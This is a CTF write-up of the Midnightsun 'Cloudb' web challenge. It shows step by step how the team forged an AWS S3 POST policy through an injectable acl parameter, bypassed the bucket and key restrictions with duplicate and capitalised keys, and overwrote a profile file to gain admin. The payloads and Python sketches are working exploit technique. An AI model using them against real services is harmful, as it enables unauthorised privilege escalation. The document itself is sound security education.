[CTF Write-up] Midnightsun CTF Quals - Cloudb (web, hard)

This weekend, my mates from the ID-10-T team and I decided to play the Midnightsun CTF. We hadn't played CTFs together for a long time, so it was nice to meet again and solve some challenges.

The Cloudb challenge, from the web category, has the following statement:

These guys made a DB in the cloud. Hope it's not a rain cloud...

Service: [http://cloudb-01.play.midnightsunctf.se](http://cloudb-01.play.midnightsunctf.se/)

Author: avlidienbrunn

Intro

Another cloud challenge; I love them! This one is about gaining admin privileges on a cloud data storage platform.



The platform lets you upload a profile pic by posting it directly to an Amazon AWS S3 bucket. The upload process consists of two different requests:



- A GET request to the /signature path, passing an ACL and an HMAC signature as parameters. This request returns a base64-encoded JSON document containing an AWS S3 bucket POST policy:

The decoded base64 policy:

    {
        "expiration": "2019-04-06T14:17:03.000Z",
        "conditions": [
            ["content-length-range", 1, 10000],
            {"bucket": "cloudb-profilepics"},
            {"acl": "public-read"},
            ["starts-with", "$key", "profilepics/"]
        ]
    }



- A POST request to the AWS S3 bucket, following Amazon's standard format for browser-based POST uploads, documented here: https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-post-example.html

So it seems we first request a policy and then use that policy to POST our profile pic to the S3 bucket.
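The two-step flow can be sketched in Python: decode the policy that /signature returns, then assemble the multipart form fields for the S3 POST. This is a minimal sketch, assuming the decoded policy is strict JSON (as in the dump above) and that the upload uses the SigV4 form fields from the linked AWS example. The policy is re-encoded locally, and the credential, region, date and signature are placeholders, not values from the challenge. Sending the form is left out.

```python
import base64
import json
from typing import List, Tuple


def decode_policy(policy_b64: str) -> dict:
    """Step 1: decode the base64 policy returned by GET /signature."""
    return json.loads(base64.b64decode(policy_b64))


def build_post_fields(
    key: str,
    acl: str,
    policy_b64: str,
    credential: str,
    amz_date: str,
    signature: str,
    file_bytes: bytes,
) -> List[Tuple[str, object]]:
    """Step 2: multipart form fields for a SigV4 browser-based POST to S3."""
    return [
        ("key", key),
        ("acl", acl),
        ("policy", policy_b64),
        ("x-amz-algorithm", "AWS4-HMAC-SHA256"),
        ("x-amz-credential", credential),
        ("x-amz-date", amz_date),
        ("x-amz-signature", signature),
        # S3 requires the file content to be the last field of the form.
        ("file", file_bytes),
    ]


# Placeholder input: the challenge policy, re-encoded locally.
policy_b64 = base64.b64encode(json.dumps({
    "expiration": "2019-04-06T14:17:03.000Z",
    "conditions": [
        ["content-length-range", 1, 10000],
        {"bucket": "cloudb-profilepics"},
        {"acl": "public-read"},
        ["starts-with", "$key", "profilepics/"],
    ],
}).encode()).decode()

policy = decode_policy(policy_b64)
fields = build_post_fields(
    key="profilepics/idiotsctf@idiots.com/ejemplo.jpeg",
    acl=policy["conditions"][2]["acl"],
    policy_b64=policy_b64,
    credential="AKIDEXAMPLE/20190406/us-east-1/s3/aws4_request",  # hypothetical
    amz_date="20190406T141703Z",  # hypothetical
    signature="0" * 64,  # dummy value
    file_bytes=b"\xff\xd8\xff",  # first bytes of a JPEG, for illustration
)
print([name for name, _ in fields])
```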

Our profile pic is saved at /profilepics/idiotsctf@idiots.com/ejemplo.jpeg.



The application also lets us request our profile information at the /userinfo/idiotsctf@idiots.com/info.json endpoint, which returns the following JSON:

    {
        "admin": false,
        "profilepic": "/profilepics/idiotsctf@idiots.com/ejemplo.jpeg",
        "hmac": "427881d9d33e2e619047bbaff90205a6c804524405d3574c8f4dfcabee162788",
        "name": "idiotsctf",
        "email": "idiotsctf@idiots.com"
    }

Hmm… that “admin” flag is set to false. It seems we will need to overwrite our /userinfo/idiotsctf@idiots.com/info.json profile file and set the admin flag to true.

Understanding a bit of how AWS S3 POST policies work.

Before continuing, it's necessary to understand a bit of how AWS S3 policies work. Amazon lets developers accept uploads to an S3 bucket via POST requests sent directly from the client. To do this, the developer's server has to create and sign a policy for each user upload; this is what the GET /signature request does.

The policy controls how long the client has to upload the content, where it will be stored, the content type, which bucket is allowed, and so on.
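S3 only trusts a policy that arrives with a matching signature. Under Signature Version 4, which is the scheme in the AWS example linked above, the signature is an HMAC-SHA256 over the base64 policy, using a key derived from the secret key, date, region and service. This is a sketch of that derivation, assuming SigV4. The secret key, date and region below are made up.

```python
import base64
import hashlib
import hmac
import json


def _hmac_sha256(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()


def sign_post_policy(secret_key: str, date_stamp: str, region: str, policy_b64: str) -> str:
    """SigV4 signature for an S3 browser-based POST policy.

    The signing key is derived from the secret key, the date (YYYYMMDD), the
    region and the service; the string to sign is the base64 policy itself.
    """
    k_date = _hmac_sha256(("AWS4" + secret_key).encode("utf-8"), date_stamp)
    k_region = _hmac_sha256(k_date, region)
    k_service = _hmac_sha256(k_region, "s3")
    k_signing = _hmac_sha256(k_service, "aws4_request")
    return hmac.new(k_signing, policy_b64.encode("utf-8"), hashlib.sha256).hexdigest()


policy = {
    "expiration": "2019-04-06T14:17:03.000Z",
    "conditions": [{"bucket": "cloudb-profilepics"}, {"acl": "public-read"}],
}
policy_b64 = base64.b64encode(json.dumps(policy).encode()).decode()
# Made-up secret and region, for illustration only.
signature = sign_post_policy("EXAMPLE-SECRET-KEY", "20190406", "us-east-1", policy_b64)
print(signature)  # 64 hex characters, sent as x-amz-signature
```

Because the signature covers the whole base64 policy, the client can't edit the policy after /signature returns it. Any tampering has to happen before the server signs it.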

The JSON policy shown in the Intro says:

- Your POST upload permission ends at 2019-04-06T14:17:03.000Z.
- Uploaded files must be between 1 and 10000 bytes long.
- You are allowed to upload to the cloudb-profilepics bucket.
- Your ACL will be public-read, so everyone can read the content you upload.
- The S3 object key you upload to must start with profilepics/.
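The list above can be made concrete with a toy evaluator for exactly these condition types. This is a simplification written for this write-up, not S3's real validation logic. For instance, it treats the bucket as if it were a form field, while S3 takes it from the request. The function name is hypothetical.

```python
from typing import Any, Dict, List

POLICY_CONDITIONS = [
    ["content-length-range", 1, 10000],
    {"bucket": "cloudb-profilepics"},
    {"acl": "public-read"},
    ["starts-with", "$key", "profilepics/"],
]


def failed_conditions(conditions: List[Any], form: Dict[str, str], size: int) -> List[str]:
    """Describe every condition the upload would violate.

    Toy model: only handles the three condition types in the challenge policy,
    and treats "bucket" as if it were a form field.
    """
    failed = []
    for cond in conditions:
        if isinstance(cond, dict):
            # {"field": "value"}: exact match.
            field, expected = next(iter(cond.items()))
            if form.get(field) != expected:
                failed.append(f"{field} == {expected!r}")
        elif cond[0] == "starts-with":
            field, prefix = cond[1].lstrip("$"), cond[2]
            if not form.get(field, "").startswith(prefix):
                failed.append(f"{field} starts-with {prefix!r}")
        elif cond[0] == "content-length-range":
            low, high = cond[1], cond[2]
            if not low <= size <= high:
                failed.append(f"size in [{low}, {high}]")
    return failed


ok = {"bucket": "cloudb-profilepics", "acl": "public-read",
      "key": "profilepics/idiotsctf@idiots.com/ejemplo.jpeg"}
bad = {"bucket": "cloudb-users", "acl": "public-read",
       "key": "users/idiotsctf@idiots.com/info.json"}
print(failed_conditions(POLICY_CONDITIONS, ok, 5000))   # []
print(failed_conditions(POLICY_CONDITIONS, bad, 5000))  # bucket and key rules fail
```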

The magic of teamwork.

Phiber, from int3pids, is one of our ID-10-T teammates. He was the first to start working on this challenge. When I woke up, he had already made progress: he had figured out how to inject characters into the S3 policy generated by the /signature controller.

- First, he found the secret key used to compute the hmac parameter, which signs the acl parameter. The key was [object Object], literally.
- Second, he was able to inject JSON strings through the acl parameter.

Let's explain it:

A “common” query could be /signature?hmac=<hmac>&acl=public-read, which returns the JSON shown in the Intro. Now, if we inject some characters, like this: /signature?hmac=<hmac>&acl=public-read'} test (with a valid hmac for that acl value), the acl part of the base64-encoded policy looks like this:

... {'acl': 'public-read'}, test ...

We can inject things on the policy!!!
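Phiber's two findings can be combined into a toy version of the /signature controller. Everything in this sketch is an assumption. We never saw the server code. The template is reconstructed from the policy we decoded, using single quotes as the injected output suggests. HMAC-SHA256 is only a guess, based on the 64-hex-character hmac field in info.json. The function names are hypothetical. As a side note, "[object Object]" is the string JavaScript produces for a plain object, which hints at a key-handling bug on the server.

```python
import base64
import hashlib
import hmac

# Hypothetical reconstruction of /signature; the real server code was never seen.
HMAC_KEY = b"[object Object]"

# Single-quoted template, matching the injected output we observed.
TEMPLATE = (
    "{'expiration': '2019-04-06T14:17:03.000Z', "
    "'conditions': [['content-length-range', 1, 10000], "
    "{'bucket': 'cloudb-profilepics'}, "
    "{'acl': '%s'}, "
    "['starts-with', '$key', 'profilepics/']]}"
)


def sign_acl(acl: str) -> str:
    """Value of the hmac query parameter for an acl (SHA-256 is assumed)."""
    return hmac.new(HMAC_KEY, acl.encode(), hashlib.sha256).hexdigest()


def signature_endpoint(acl: str, mac: str) -> str:
    """Toy GET /signature: check the MAC, then paste acl into the policy."""
    if not hmac.compare_digest(sign_acl(acl), mac):
        raise PermissionError("invalid hmac")
    policy = TEMPLATE % acl  # the bug: acl is inserted without any escaping
    return base64.b64encode(policy.encode()).decode()


# With the key known, any acl value can be signed, including a malicious one.
payload = "public-read'} test"
policy_b64 = signature_endpoint(payload, sign_acl(payload))
print(base64.b64decode(policy_b64).decode())
```

In this model, the hmac check only proves that someone holding the key signed the acl. Once the key is known, the check no longer protects the unescaped string concatenation.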

Looking for the buckets.

Now we know we can tamper with the policy, and that we need to overwrite the /userinfo/idiotsctf@idiots.com/info.json file to obtain admin privileges. However, we don't know the name of the S3 bucket where user information is stored.

Patatas in action:

Our teammate @HackingPatatas has an incredible ability to try random things and make them work. He tried cloudb-users.s3.amazonaws.com and it was a valid bucket, so it's highly probable that the info.json file is stored in that bucket.
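@HackingPatatas checked the guess by hand. The same check can be scripted using S3's usual behaviour for anonymous requests: a bucket that doesn't exist answers 404 (NoSuchBucket), while an existing private one answers 403 (AccessDenied). This is a small sketch, and the function names are our own. probe() makes a real network request, so the usage below only exercises the offline helpers.

```python
import urllib.error
import urllib.request


def bucket_url(name: str) -> str:
    """Virtual-hosted-style URL, e.g. https://cloudb-users.s3.amazonaws.com/"""
    return f"https://{name}.s3.amazonaws.com/"


def classify(status: int) -> str:
    """Interpret S3's answer to an anonymous request on a bucket URL."""
    if status == 404:
        return "no such bucket"
    if status in (200, 403):
        # 403 still means the bucket exists (it is just private);
        # 200 means it is even publicly listable.
        return "exists"
    return "unknown"


def probe(name: str) -> str:
    """Send an anonymous HEAD request to the bucket and classify the answer."""
    req = urllib.request.Request(bucket_url(name), method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return classify(resp.status)
    except urllib.error.HTTPError as err:
        return classify(err.code)


print(bucket_url("cloudb-users"), classify(403))
```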

Bypassing policy restrictions.

The policy tells us we can't just upload to the cloudb-users bucket, since the bucket and the key prefix we are allowed to use are fixed by the policy. We need to figure out how to invalidate those restrictions and add our own.

If we try to POST something like this:

    POST https://cloudb-users.s3.amazonaws.com/

    {
        "key": "users/idiotsctf@idiots.com/info.json",
        ...
    }

S3 rejects the request, as the policy only allows cloudb-profilepics as the bucket and profilepics/ as the key prefix.

One way to bypass at least the bucket restriction is to add another conditions block. When the same key appears more than once in the same JSON object, many parsers keep only the last occurrence, and Amazon's seems to do the same. Since the conditions key appears before the user-controlled, injectable acl parameter, we can inject something like this to replace the previous conditions:

    public-read'}],
    'conditions': [
        ['starts-with', '$key', 'users/'],
        {'bucket':'cloudb-users'},
        {'acl':'public-read

Note how we close the previous conditions array with ] and open a new one with cloudb-users as the allowed bucket. This returned the error Invalid according to Policy: Policy Condition failed: ["starts-with", "$key", "profilepics/"]

Hmmm. The original starts-with condition comes after our injection point, so it ends up inside our new conditions block too. The key would have to start with both users/ and profilepics/, which is impossible.
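Python's json module also keeps the last value for a duplicated key, so it can reproduce the failure locally. This sketch uses a double-quoted stand-in for the server's template, because the real one appears to use single quotes, which a strict JSON parser rejects. Whether Amazon's parser behaves exactly like Python's is an inference from the error message, not something we verified.

```python
import json

# Stand-in for the /signature template (double quotes so json.loads accepts it).
TEMPLATE = (
    '{"expiration": "2019-04-06T14:17:03.000Z", '
    '"conditions": [["content-length-range", 1, 10000], '
    '{"bucket": "cloudb-profilepics"}, '
    '{"acl": "%s"}, '
    '["starts-with", "$key", "profilepics/"]]}'
)

# Close the original conditions array and open a replacement one.
injection = (
    'public-read"}], '
    '"conditions": [["starts-with", "$key", "users/"], '
    '{"bucket": "cloudb-users"}, '
    '{"acl": "public-read'
)

policy = json.loads(TEMPLATE % injection)  # duplicate "conditions": last one wins
for condition in policy["conditions"]:
    print(condition)
# ['starts-with', '$key', 'users/']
# {'bucket': 'cloudb-users'}
# {'acl': 'public-read'}
# ['starts-with', '$key', 'profilepics/']
```

The trailing rule from the template lands inside our replacement block, and no key can satisfy both starts-with rules.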

The magic of the patata… again.

We need to find a way to get rid of the trailing starts-with profilepics/ condition. We can do this by opening a new JSON block at the end of our injection, like this:

    (our injection) ... ], 'new-block': [{'acl': 'public-read

That way, the trailing starts-with is no longer inside the conditions block. BUUUUUUT, we can't declare blocks with names other than conditions or expiration, or we get an error like this: Invalid Policy: Unexpected: 'new-block'.

This is terrible: we can only use two keys. If we name the new block conditions, it becomes the last conditions block and replaces our injected conditions again, so we gain nothing. The other key, expiration, only accepts a single string as its value.

After a bit of trial and error, our teammate @HackingPatatas did it again. He wrote in the team chat:

DarkPatatas, [6 Apr 2019 15:29:10]:

ostia.. un sec (the hell... wait a second...)

JAJASDJASJASODJASOJDAOSJDAOSJdas (laughs in Spanish)

ME MATO (I'll kill myself)

lo tengo (I got it)

What? How?

He just fucking tried Conditions instead of conditions. Amazon accepted it as a valid policy key but didn't apply it as a condition, so we successfully bypassed all the restrictions.
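The final payload has three parts. It closes the original conditions array, opens a replacement conditions block with our own bucket and key prefix, and then opens a capitalised Conditions block to absorb the trailing profilepics/ rule. This sketch reuses a double-quoted stand-in for the template so that Python's json module can show the resulting structure. It assumes the real, single-quoted payload is equivalent. It does not model Amazon's handling of Conditions, which we only know from S3's responses. In the real attack, the hmac parameter also has to be recomputed for this acl value, which is why knowing the key mattered.

```python
import json

# Stand-in for the /signature template (double quotes so json.loads accepts it).
TEMPLATE = (
    '{"expiration": "2019-04-06T14:17:03.000Z", '
    '"conditions": [["content-length-range", 1, 10000], '
    '{"bucket": "cloudb-profilepics"}, '
    '{"acl": "%s"}, '
    '["starts-with", "$key", "profilepics/"]]}'
)

# 1. Close the original conditions array.
# 2. Open a replacement "conditions" with our own bucket and key prefix.
# 3. Open a capitalised "Conditions" block to swallow the trailing
#    starts-with "profilepics/" rule that follows the injection point.
final_acl = (
    'public-read"}], '
    '"conditions": [["starts-with", "$key", "users/"], '
    '{"bucket": "cloudb-users"}, '
    '{"acl": "public-read"}], '
    '"Conditions": [{"acl": "public-read'
)

policy = json.loads(TEMPLATE % final_acl)  # duplicate "conditions": last one wins
print(policy["conditions"])  # only our rules
print(policy["Conditions"])  # the leftover profilepics/ rule, parked here
```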

The next step was to do the same, but this time uploading an info.json to /users/idiotsctf@idiots.com/info.json with the “admin” flag set to true. And…

Ding ding ding!!! We are admin!!! And, of course, now we can go to the /admin endpoint, authenticate and read the flag.
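For reference, the forged file is just our own profile with one flag flipped. Here is a minimal sketch of building it. It keeps the hmac field and every other field unchanged, and uses the object key from the POST attempt shown earlier, which has to satisfy the injected starts-with users/ rule.

```python
import json

# Our own profile as returned by /userinfo/idiotsctf@idiots.com/info.json.
profile = {
    "admin": False,
    "profilepic": "/profilepics/idiotsctf@idiots.com/ejemplo.jpeg",
    "hmac": "427881d9d33e2e619047bbaff90205a6c804524405d3574c8f4dfcabee162788",
    "name": "idiotsctf",
    "email": "idiotsctf@idiots.com",
}

# Copy with only the admin flag flipped; every other field is left untouched.
forged = {**profile, "admin": True}
body = json.dumps(forged).encode()

# Object key for the upload; it must satisfy the injected starts-with "users/".
key = "users/idiotsctf@idiots.com/info.json"
print(key, body.decode())
```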

Final thoughts

What the hell Amazon?

Thanks to the whole team, especially @phiber_int3 and @HackingPatatas, for helping so much in solving this challenge. It was really fun and challenging!